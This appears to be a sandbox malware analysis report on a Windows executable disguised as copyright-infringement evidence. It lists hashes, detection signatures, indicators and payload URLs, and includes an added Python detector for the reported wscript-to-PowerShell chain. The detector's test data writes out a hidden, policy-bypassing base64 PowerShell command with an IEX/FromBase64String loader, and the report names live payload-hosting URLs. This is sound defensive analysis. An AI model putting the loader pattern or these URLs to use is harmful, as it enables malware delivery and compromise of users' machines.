Windows Analysis Report
copyright_infringement_evidence_1.exe

Overview

General Information

Sample name: copyright_infringement_evidence_1.exe
Analysis ID: 1528568
MD5: 8c04e5d5adaf15173fecd9384ceda14d
SHA1: 9cbcf5134cfecb1a1f0c7e615a2a973ed8381e54
SHA256: 31599bbf15939b4fbc91a6e228b436abfef3a213ece4d92cc6d8c90c905528ad
Tags: exe, Xiamen Huixiantong Network Technology Co Ltd, user-SquiblydooBlog

Detection

Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Icon mismatch, binary includes an icon from a different legit application in order to fool users
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Sigma detected: Drops script at startup location
System process connects to network (likely due to code injection or exploit)
Yara detected Powershell decode and execute
AI detected suspicious sample
Bypasses PowerShell execution policy
Drops script or batch files to the startup folder
Found suspicious powershell code related to unpacking or dynamic code loading
Initial sample is a PE file and has a suspicious name
Obfuscated command line found
Sigma detected: Base64 Encoded PowerShell Command Detected
Sigma detected: HackTool - CrackMapExec PowerShell Obfuscation
Sigma detected: Potential PowerShell Command Line Obfuscation
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Sigma detected: PowerShell Base64 Encoded Invoke Keyword
Sigma detected: Script Interpreter Execution From Suspicious Folder
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Uses ping.exe to check the status of other devices and networks
Uses ping.exe to sleep
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Wscript starts Powershell (via cmd or directly)
Contains functionality to call native functions
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Detected potential crypto function
Enables debug privileges
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Searches for user specific document files
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Stores files to the Windows start menu directory
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Yara signature match
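The signatures above describe one execution chain: wscript.exe starts powershell.exe (directly or through cmd.exe), the PowerShell command line carries a base64 -EncodedCommand whose decoded body calls FromBase64String and an Invoke keyword, the execution policy is bypassed, a script is dropped into the Start Menu Startup folder, and `ping 127.0.0.1 -n 10` (seen later under Networking) is used as a sleep. The following Python is an added triage example, not code from the sandbox or from the sample: it applies those checks to a list of process-creation records. The records, PIDs, field names and the dropped-script file name are constructed placeholders that mirror the reported behaviour, not data from the report.

```python
"""Added example: re-implement the report's execution-chain signatures over
constructed process-creation records (Sysmon event 1 style; field names,
PIDs and the dropped-script name are assumptions, not report data)."""
import base64
import re
from dataclasses import dataclass
from typing import Iterator, List, Optional, Tuple


@dataclass
class ProcEvent:
    pid: int
    ppid: int
    image: str
    command_line: str


# powershell.exe accepts any unambiguous prefix of -EncodedCommand; cover the common ones.
ENC_FLAG = re.compile(r"(?:^|\s)-e(?:c|n|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]{16,})", re.I)
EP_BYPASS = re.compile(r"(?:^|\s)-(?:ep|ex|exec|executionpolicy)\s+(?:bypass|unrestricted)", re.I)
STARTUP_DIR = re.compile(r"\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\", re.I)
SCRIPT_EXT = re.compile(r"\.(?:js|jse|vbs|vbe|wsf|bat|cmd|ps1)\b", re.I)
SCRIPT_HOSTS = ("wscript.exe", "cscript.exe")


def decode_encoded_command(command_line: str) -> Optional[str]:
    """Plaintext of a -EncodedCommand payload (base64 over UTF-16LE), or None."""
    m = ENC_FLAG.search(command_line)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def _basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def triage(events: List[ProcEvent]) -> List[Tuple[int, str]]:
    """Return (pid, signature) pairs for every record that matches a reported behaviour."""
    by_pid = {e.pid: e for e in events}

    def ancestors(e: ProcEvent) -> Iterator[ProcEvent]:
        while e.ppid in by_pid:
            e = by_pid[e.ppid]
            yield e

    findings: List[Tuple[int, str]] = []
    for e in events:
        name = _basename(e.image)
        cl = e.command_line

        if name == "powershell.exe":
            # "Wscript starts Powershell (via cmd or directly)": check the whole ancestry.
            if any(_basename(a.image) in SCRIPT_HOSTS for a in ancestors(e)):
                findings.append((e.pid, "wscript_starts_powershell"))
            if EP_BYPASS.search(cl):
                findings.append((e.pid, "execution_policy_bypass"))
            decoded = decode_encoded_command(cl)
            if decoded is not None:
                findings.append((e.pid, "base64_encoded_command"))
                if re.search(r"FromBase64String", decoded, re.I):
                    findings.append((e.pid, "decoded_frombase64string"))
                if re.search(r"\b(?:iex|invoke-\w+)\b", decoded, re.I):
                    findings.append((e.pid, "decoded_invoke"))

        # "Uses ping.exe to sleep": loopback target plus a repeat count.
        if (name == "ping.exe"
                and re.search(r"\b(?:127\.0\.0\.1|localhost)\b", cl, re.I)
                and re.search(r"-n\s+\d+", cl, re.I)):
            findings.append((e.pid, "ping_loopback_sleep"))

        # "Drops script or batch files to the startup folder", seen here at launch time.
        if STARTUP_DIR.search(cl) and SCRIPT_EXT.search(cl):
            findings.append((e.pid, "script_in_startup_folder"))

    return findings


# Constructed stage-two stub, wrapped the way the signatures describe:
# inner base64 -> PowerShell body using FromBase64String + IEX -> UTF-16LE base64 for -enc.
_INNER = base64.b64encode(b"Write-Output 'stage-two placeholder'").decode()
PS_BODY = f"IEX ([Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('{_INNER}')))"
ENCODED = base64.b64encode(PS_BODY.encode("utf-16-le")).decode()

_STARTUP = r"C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup"
SAMPLE_EVENTS = [  # constructed records; PIDs and "dropped.js" are placeholders
    ProcEvent(100, 1, r"C:\Users\user\Desktop\copyright_infringement_evidence_1.exe",
              r'"C:\Users\user\Desktop\copyright_infringement_evidence_1.exe"'),
    ProcEvent(200, 100, r"C:\Windows\System32\wscript.exe",
              f'"C:\\Windows\\System32\\wscript.exe" "{_STARTUP}\\dropped.js"'),
    ProcEvent(300, 200, r"C:\Windows\System32\cmd.exe", "cmd.exe /c ping 127.0.0.1 -n 10"),
    ProcEvent(301, 300, r"C:\Windows\System32\PING.EXE", "ping 127.0.0.1 -n 10"),
    ProcEvent(400, 200, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              f"powershell.exe -nop -w hidden -ep bypass -enc {ENCODED}"),
]


def triage_sample() -> List[Tuple[int, str]]:
    return triage(SAMPLE_EVENTS)


if __name__ == "__main__":
    for pid, sig in triage_sample():
        print(f"pid {pid}: {sig}")
```

The ancestry walk matters: in the reported chain PowerShell is sometimes a grandchild of wscript.exe (through cmd.exe), so a parent-only check misses it. Decoding the -EncodedCommand payload before matching is what lets the FromBase64String and Invoke checks fire on a command line that, on its face, contains neither keyword.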

Classification

AV Detection

Source: https://raw.githubusercontent.com/NoDetectOn/NoDetectOn/refs/heads/main/DetahNote_J.txt Virustotal: Detection: 10% Permalink
Source: https://raw.githubusercontent.co Virustotal: Detection: 6% Permalink
Source: copyright_infringement_evidence_1.exe Virustotal: Detection: 15% Permalink
Source: Submitted Sample Integrated Neural Analysis Model: Matched 94.0% probability
Source: C:\Users\user\Desktop\copyright_infringement_evidence_1.exe Code function: 0_2_00007FF7A178F110 BCryptGenRandom,SystemFunction036,BCryptGenRandom,SystemFunction036, 0_2_00007FF7A178F110
Source: C:\Users\user\Desktop\copyright_infringement_evidence_1.exe Code function: 0_2_00007FF7A1803050 DecryptMessage, 0_2_00007FF7A1803050
Source: copyright_infringement_evidence_1.exe Static PE information: certificate valid
Source: copyright_infringement_evidence_1.exe Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb{ source: powershell.exe, 00000034.00000002.3072232839.000002105615A000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb A source: powershell.exe, 00000034.00000002.3072232839.000002105615A000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: ib.pdb%~ source: powershell.exe, 00000023.00000002.2349006355.000002080DEC9000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\dll\mscorlib.pdb source: powershell.exe, 00000024.00000002.2530773405.000001EF69F80000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: n.pdb source: powershell.exe, 00000023.00000002.2517360363.0000020827DD5000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000023.00000002.2526910009.0000020828190000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000034.00000002.3054808886.0000021055D8E000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000034.00000002.3054808886.0000021055D65000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: btem.pdb source: powershell.exe, 00000034.00000002.2529930653.000002103BD5B000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: bpdbtem.pdbn source: powershell.exe, 00000023.00000002.2517360363.0000020827D23000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000024.00000002.2530773405.000001EF69FC3000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\System.Management.Automation.pdb source: powershell.exe, 00000034.00000002.3054808886.0000021055D65000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb2[0 source: powershell.exe, 00000023.00000002.2526910009.00000208281C2000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdb-d source: powershell.exe, 00000034.00000002.3072232839.000002105615A000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb}i source: powershell.exe, 00000023.00000002.2517360363.0000020827DD5000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb source: powershell.exe, 00000034.00000002.3072232839.000002105615A000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: re.pdb source: powershell.exe, 00000034.00000002.2529930653.000002103BD5B000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: copyright_infringement_evidence_1.pdb source: copyright_infringement_evidence_1.exe, copyright_infringement_evidence_1.exe, 00000000.00000002.2765024695.00007FF7A18DA000.00000002.00000001.01000000.00000003.sdmp, copyright_infringement_evidence_1.exe, 00000000.00000000.2054790226.00007FF7A18DA000.00000002.00000001.01000000.00000003.sdmp
Source: Binary string: System.pdbs\CLSID\{0A29FF9E-7F9C-4437-8B11-F424491E3931}\InprocServer32 Are source: powershell.exe, 00000024.00000002.2530773405.000001EF69FC3000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: ystem.Core.pdb/ source: powershell.exe, 00000023.00000002.2517360363.0000020827D23000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000023.00000002.2349006355.000002080DEC9000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: powershell.exe, 00000023.00000002.2526910009.00000208281C2000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000024.00000002.2522177063.000001EF69D90000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000034.00000002.3072232839.000002105615A000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: mscorlib.pdb source: powershell.exe, 00000023.00000002.2526910009.00000208281B4000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000024.00000002.2530773405.000001EF69F80000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000034.00000002.3072232839.000002105615A000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\dll\System.pdb source: powershell.exe, 00000024.00000002.2530773405.000001EF69F80000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: CallSite.Target.pdbm source: powershell.exe, 00000023.00000002.2530199536.0000020828219000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: *e.pdb source: powershell.exe, 00000023.00000002.2526910009.00000208281C2000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System\v4.0_4.0.0.0__b77a5c561934e089\System.pdb source: powershell.exe, 00000023.00000002.2526910009.00000208281C2000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000034.00000002.3072232839.000002105615A000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: mscorlib.pdbCLSID\{0A29FF9E-7F9C-4437-8B11-F424491E3931}\InprocServer32 source: powershell.exe, 00000023.00000002.2349006355.000002080DEC9000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000024.00000002.2530773405.000001EF69FC3000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000034.00000002.3072232839.000002105615A000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Core.pdb source: powershell.exe, 00000024.00000002.2530773405.000001EF69FC3000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: ws\dll\System.pdb source: powershell.exe, 00000024.00000002.2530773405.000001EF69F80000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdbC source: powershell.exe, 00000024.00000002.2530773405.000001EF69FC3000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: ion.pdb source: powershell.exe, 00000034.00000002.3072232839.000002105615A000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: re.pdbZJK source: powershell.exe, 00000034.00000002.2529930653.000002103BD5B000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: 6?ystem.Core.pdb=K source: powershell.exe, 00000034.00000002.2529930653.000002103BD5B000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System\v4.0_4.0.0.0__b77a5c561934e089\System.pdbLZ source: powershell.exe, 00000023.00000002.2526910009.00000208281C2000.00000004.00000020.00020000.00000000.sdmp
Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user Jump to behavior
Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows Jump to behavior
Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user\AppData\Roaming\Microsoft Jump to behavior
Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu Jump to behavior
Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user\AppData\Roaming Jump to behavior
Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user\AppData Jump to behavior

Software Vulnerabilities

Source: C:\Windows\System32\wscript.exe Child: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Networking

Source: C:\Windows\System32\wscript.exe Network Connect: 188.114.96.3 443
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\PING.EXE ping 127.0.0.1 -n 10
Source: Joe Sandbox View IP Address: 23.47.168.24
Source: Joe Sandbox View IP Address: 185.199.109.133
Source: Joe Sandbox View IP Address: 188.114.96.3
Source: Joe Sandbox View ASN Name: CLOUDFLARENETUS
Source: copyright_infringement_evidence_1.exe, 00000000.00000003.2114946387.00000139D8A88000.00000004.00000020.00020000.00000000.sdmp, copyright_infringement_evidence_1.exe, 00000000.00000003.2762559707.00000139D8A88000.00000004.00000020.00020000.00000000.sdmp, copyright_infringement_evidence_1.exe, 00000000.00000003.2069408795.00000139D8AB0000.00000004.00000020.00020000.00000000.sdmp, copyright_infringement_evidence_1.exe, 00000000.00000003.2120938127.00000139D8A88000.00000004.00000020.00020000.00000000.sdmp, copyright_infringement_evidence_1.exe, 00000000.00000003.2109519395.00000139D8A88000.00000004.00000020.00020000.00000000.sdmp, copyright_infringement_evidence_1.exe, 00000000.00000003.2069485125.00000139D8A88000.00000004.00000020.00020000.00000000.sdmp, copyright_infringement_evidence_1.exe, 00000000.00000003.2115104514.00000139D8A88000.00000004.00000020.00020000.00000000.sdmp, copyright_infringement_evidence_1.exe, 00000000.00000002.2763847177.00000139D8A88000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://172.214.220.82/data/2p_bee.js
Source: copyright_infringement_evidence_1.exe, 00000000.00000003.2114946387.00000139D8A88000.00000004.00000020.00020000.00000000.sdmp, copyright_infringement_evidence_1.exe, 00000000.00000003.2762559707.00000139D8A88000.00000004.00000020.00020000.00000000.sdmp, copyright_infringement_evidence_1.exe, 00000000.00000003.2120938127.00000139D8A88000.00000004.00000020.00020000.00000000.sdmp, copyright_infringement_evidence_1.exe, 00000000.00000003.2109519395.00000139D8A88000.00000004.00000020.00020000.00000000.sdmp, copyright_infringement_evidence_1.exe, 00000000.00000003.2069485125.00000139D8A88000.00000004.00000020.00020000.00000000.sdmp, copyright_infringement_evidence_1.exe, 00000000.00000003.2115104514.00000139D8A88000.00000004.00000020.00020000.00000000.sdmp, copyright_infringement_evidence_1.exe, 00000000.00000002.2763847177.00000139D8A88000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://172.214.220.82/data/2p_bee.jsT
Source: copyright_infringement_evidence_1.exe, 00000000.00000003.2114946387.00000139D8A88000.00000004.00000020.00020000.00000000.sdmp, copyright_infringement_evidence_1.exe, 00000000.00000003.2762559707.00000139D8A88000.00000004.00000020.00020000.00000000.sdmp, copyright_infringement_evidence_1.exe, 00000000.00000003.2069408795.00000139D8AB0000.00000004.00000020.00020000.00000000.sdmp, copyright_infringement_evidence_1.exe, 00000000.00000003.2120938127.00000139D8A88000.00000004.00000020.00020000.00000000.sdmp, copyright_infringement_evidence_1.exe, 00000000.00000003.2109519395.00000139D8A88000.00000004.00000020.00020000.00000000.sdmp, copyright_infringement_evidence_1.exe, 00000000.00000003.2069485125.00000139D8A88000.00000004.00000020.00020000.00000000.sdmp, copyright_infringement_evidence_1.exe, 00000000.00000003.2115104514.00000139D8A88000.00000004.00000020.00020000.00000000.sdmp, copyright_infringement_evidence_1.exe, 00000000.00000002.2763847177.00000139D8A88000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://172.214.220.82/data/2x_bee.js
Source: copyright_infringement_evidence_1.exe, 00000000.00000003.2114946387.00000139D8A88000.00000004.00000020.00020000.00000000.sdmp, copyright_infringement_evidence_1.exe, 00000000.00000003.2762559707.00000139D8A88000.00000004.00000020.00020000.00000000.sdmp, copyright_infringement_evidence_1.exe, 00000000.00000003.2069408795.00000139D8AB0000.00000004.00000020.00020000.00000000.sdmp, copyright_infringement_evidence_1.exe, 00000000.00000003.2120938127.00000139D8A88000.00000004.00000020.00020000.00000000.sdmp, copyright_infringement_evidence_1.exe, 00000000.00000003.2109519395.00000139D8A88000.00000004.00000020.00020000.00000000.sdmp, copyright_infringement_evidence_1.exe, 00000000.00000003.2069485125.00000139D8A88000.00000004.00000020.00020000.00000000.sdmp, copyright_infringement_evidence_1.exe, 00000000.00000003.2115104514.00000139D8A88000.00000004.00000020.00020000.00000000.sdmp, copyright_infringement_evidence_1.exe, 00000000.00000002.2763847177.00000139D8A88000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://172.214.220.82/data/Benefits.pdf
Source: copyright_infringement_evidence_1.exe, 00000000.00000003.2114946387.00000139D8A88000.00000004.00000020.00020000.00000000.sdmp, copyright_infringement_evidence_1.exe, 00000000.00000003.2762559707.00000139D8A88000.00000004.00000020.00020000.00000000.sdmp, copyright_infringement_evidence_1.exe, 00000000.00000003.2120938127.00000139D8A88000.00000004.00000020.00020000.00000000.sdmp, copyright_infringement_evidence_1.exe, 00000000.00000003.2109519395.00000139D8A88000.00000004.00000020.00020000.00000000.sdmp, copyright_infringement_evidence_1.exe, 00000000.00000003.2115104514.00000139D8A88000.00000004.00000020.00020000.00000000.sdmp, copyright_infringement_evidence_1.exe, 00000000.00000002.2763847177.00000139D8A88000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://172.214.220.82/data/Benefits.pdfy
Source: powershell.exe, 00000023.00000002.2491780755.000002081FE6B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000023.00000002.2491780755.000002081FD28000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000024.00000002.2492413706.000001EF61E2B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000024.00000002.2492413706.000001EF61CE8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://nuget.org/NuGet.exe
Source: wscript.exe, 0000002C.00000002.3471646885.000001A7C4950000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000002C.00000003.2828182753.000001A7C4950000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://paste.ee/
Source: wscript.exe, 0000000A.00000003.2751835714.000002459172B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.2747396981.0000024591724000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000002.2756878169.0000024591734000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.2752132639.000002459172E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.2754105505.0000024591732000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.2753930221.000002459172F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000027.00000002.3471457140.0000025469917000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000002C.00000003.2828182753.000001A7C4950000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://paste.ee/d/0
Source: wscript.exe, 0000002C.00000002.3473543541.000001A7C67E5000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://paste.ee/d/0Hqn
Source: wscript.exe, 0000000A.00000003.2751835714.000002459172B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000002.2759005910.00000245935F6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.2747396981.0000024591724000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.2753930221.000002459172C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.2753152909.00000245919C9000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000002.2756734173.000002459172C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.2752530561.00000245938C0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000002.2758612409.00000245919CA000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000002.2758847618.00000245935C0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000027.00000002.3473103355.0000025469B55000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000027.00000002.3471457140.0000025469917000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000027.00000002.3473731925.000002546B766000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000027.00000002.3475106348.000002546BA30000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000002C.00000002.3471646885.000001A7C4950000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000002C.00000002.3473543541.000001A7C67C0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000002C.00000003.2828182753.000001A7C4950000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000002C.00000003.2830702699.000001A7C6801000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000002C.00000003.2830853242.000001A7C6806000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000002C.00000002.3472903249.000001A7C4C95000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://paste.ee/d/0Hqnx
Source: wscript.exe, 0000002C.00000002.3475617575.000001A7C6A50000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://paste.ee/d/0Hqnx2
Source: wscript.exe, 00000008.00000003.2755090080.000001C4CE1B2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000008.00000003.2741039661.000001C4CE1A2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000008.00000002.2757118395.000001C4CE1B2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000008.00000003.2752222728.000001C4CE1B0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000008.00000003.2751783245.000001C4CE1A7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://paste.ee/d/6
Source: wscript.exe, 00000008.00000003.2754225942.000001C4D0006000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000008.00000002.2759045448.000001C4CE4EA000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000008.00000003.2754808331.000001C4D0007000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000008.00000003.2753774026.000001C4CE4E9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://paste.ee/d/6fcuV
Source: wscript.exe, 00000008.00000003.2741039661.000001C4CE1A2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000008.00000003.2755090080.000001C4CE1A9000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000008.00000003.2751783245.000001C4CE1A7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://paste.ee/d/6fcuVl6r.dll
Source: wscript.exe, 00000008.00000003.2751035108.000001C4D0290000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://paste.ee/d/6fcuVn
Source: powershell.exe, 00000034.00000002.2542796485.000002103DDDE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000023.00000002.2350744372.0000020811384000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000024.00000002.2351652248.000001EF5330C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://raw.githubusercontent.com
Source: powershell.exe, 0000001D.00000002.2295368563.00000174D4B9A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.2295109994.000001FBCD2D1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001F.00000002.2569063235.000001BA5AAC5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000021.00000002.2571339903.000001AA5180F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000023.00000002.2350744372.000002080FCB1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000024.00000002.2351652248.000001EF51C71000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002B.00000002.2398514056.000002DB32723000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002D.00000002.2490781684.000002390C018000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000032.00000002.3150551059.000001ECD64FB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000034.00000002.2542796485.000002103DBB1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000034.00000002.2542796485.000002103DDDE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000023.00000002.2526910009.0000020828190000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.microsoft.
Source: powershell.exe, 00000023.00000002.2526910009.0000020828190000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.microsoft.pki/
Source: powershell.exe, 0000001D.00000002.2295368563.00000174D4BE1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.w3.
